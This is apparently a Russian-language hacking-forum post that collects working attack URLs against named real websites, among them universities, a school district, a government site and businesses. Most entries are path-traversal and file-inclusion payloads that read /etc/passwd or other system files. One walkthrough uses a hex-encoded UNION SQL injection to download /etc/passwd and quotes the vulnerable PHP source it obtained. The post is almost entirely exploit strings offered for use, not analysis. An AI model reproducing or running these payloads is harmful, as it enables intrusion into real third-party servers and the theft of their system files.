PHP Иньекции

http://pvp-game.ru/index.php?act=../index цикл index.php

 

Думаю лучше к php иньекции отнести..хотя гугл говорит как sql иньекцию дак боян, но всё равно баг в другом скрипте!)

Интересная скуля, берёт имя файла из БД и даёт его на загрузку. (Я лично первый раз такое встречаю)

Code:

http://www.ces.fau.edu/OWLS08/presentations/presentations.php?id=-24+union+select+version()--

Идёт файл на загрузку, в имени файла вывод:

5.0.51a-3ubuntu5.4

подставим своё значение:
magic qutes = on, поэжтому захексим

Code:

http://www.ces.fau.edu/OWLS08/presentations/presentations.php?id=-24+union+select+0x2f6574632f706173737764--

И скачиваем /etc/passwd

presentations.php

PHP:

    error_reporting(0);
    mysql_connect("localhost","*","*");
    mysql_select_db( "owls08" );
    error_reporting(1);

    $id = mysql_real_escape_string( $_REQUEST['id'] );

    $query="SELECT file from presentations where id=$id";
    $result = mysql_query( $query ) or die( mysql_error() );
    $row = mysql_fetch_array( $result );

    $file = $row['file'];
    
    header("Pragma: public");
    header("Expires: 0");
    header("Cache-Control: must-revalidate, post-check=0, pre-check=0");

    header("Content-Type: application/force-download");
    header( "Content-Disposition: attachment; filename=".basename($file));
    header("Content-Transfer-Encoding: binary");
    header("Content-Length: ".filesize($file));
    header( "Content-Description: File Transfer");
    @readfile($file); 

 

http://piecero.awardspace.us/index.php?page=../../../../../../../../../../../etc/passwd
http://www.mvhs.sad3.k12.me.us/sad3/mves/site.php?page=../../../../../../../../../../../etc/passwd

 

Code:

http://www.duma.gov.ru/index.jsp?t=./index.jsp

 

Code:

http://www.summerschoolalpbach.at/index.php?file=index.php

Code:

http://www.b2match.com/watervienna09/index.php?file=index.php

Code:

http://www.autoday2009.sk/index.php?file=../../../../../../../../../../../etc/passwd

 

http://sdm.mit.edu/index.php?fileName=index.php

 

http://stroycement.ru/stat.php?p=../../../../etc/passwd

 

European investment banking firm

Code:

http://www.druekerco.com/index.php?folder=Career&page=../../../../../../etc/hosts.lpd

 

http://eminima.org/safepup/index.php?file=../../../../../../../../../../../etc/passwd

 

Code:

http://www.physics.carleton.ca/atlas/index.php?file=../../../../../../../../../../../etc/passwd

http://www.abei.it/index.php?file=../../../../../../../../../../../etc/passwd&sezione=Convegno%20Nazionale%202008&menu=Programma

http://www.enterprise-europe-network.ch/marketplace/index.php?file=../../../../../../../../../../../etc/passwd

 

http://wework.philaforum.com/index.php?site=http://google.com/search?q=

 

Code:

http://www.ruvr.ru/index.php?lng=../../../../../../../../../../../../../../etc/passwd////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

 

http://www.myperfecthalf.com/forum/topic.php?topic_id=364&language_id=../../../../../../etc/passwd%00

 

Code:

http://www.myperfecthalf.com/member/toprated_list.php?view_mode=gallery&language_id=../../../../../../etc/passwd%00&page=32&command=online
http://kneuro.net/littlesite/index.php?file=/etc/passwd

 

http://www.prodisney.ru/index.php?page=index.php

 

Code:

http://www.automoto66.ru/index.php?state=other&file=../../../../../../etc/passwd&page=2
http://www.mainechiropractic.org/index.php?file=/etc/passwd%00

 

Code:

http://www.sports-emotions.ch/index.php?cat=../../../../../../etc/passwd%00